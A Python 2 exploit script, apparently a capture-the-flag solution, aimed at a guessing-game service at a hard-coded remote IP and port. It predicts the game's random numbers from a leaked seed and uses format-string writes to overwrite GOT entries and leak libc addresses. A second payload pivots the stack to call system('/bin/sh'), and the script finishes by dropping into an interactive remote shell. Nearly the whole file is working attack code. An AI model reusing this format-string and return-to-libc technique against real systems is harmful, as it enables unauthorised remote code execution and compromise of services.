from codez import *
import subprocess

def get_guess_numbers(seed):
    p = subprocess.Popen('./rand',stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE)
    r=p.communicate(seed)
    return r[0].strip().split()

def do_game(p):
    r.read('?')
    r.write(p)
    x=r.read('>').split('#')[1]
    # x=r.read('\n')[:-1]
    leak = chunks(x,4)[:4]
    #buff = unpack('I',leak[-1])[0] - 40 -0x64
    guess =  get_guess_numbers(leak[0])

    r.write(' '.join(guess) + "\n")
    
IDX=17
#for idx in range(20):
p0 = fmt_write(IDX,4,0x804878C,0x804A024)
p0 += 'aa'+pack('I',0x804A00C) +'|%' + (str(IDX+len(p0)/4+1)) +'$s|'
p0=p0.ljust(0x63,'a') +'#'

#r = Remote('localhost',1234)
r = Remote('175.119.158.135', 8909 )
#raw_input('x')    
do_game(p0)
if 'Congratulation,' in r.read(','):
    print '.ok.party.time'
    leak2=r.read('#').split('|',1)[1]
#    print `leak2`
    x=map(lambda x:unpack('I',x.ljust(4,"\x00"))[0],chunks(leak2,4))
    libc = x[0] - 890720 #0xd9250
    mv_stack = libc + 0x000d9015 # 0x000d8a65
    system   = libc + 242048  #0x3aeb0
    binsh    = libc +1439259 # 0x15e8f9
    print 'libc',hex(libc)
    print 'gadget',hex(mv_stack)
    print map(hex,x)
    p1 = fmt_write(IDX,6,mv_stack,0x804A024).ljust(35,'x')
    p1 += 'x'+pack('I',0x8048994)*6
    p1 += pack('III',system,0xdeadbeef,binsh)
    p1=p1.ljust(0x63,'a') +'#'
    do_game(p1)
    r.read('!!')
    r.interactive()


    
#    if '|0x41414141|' in  r.read():
#    print '[+] found it @ %d' %idx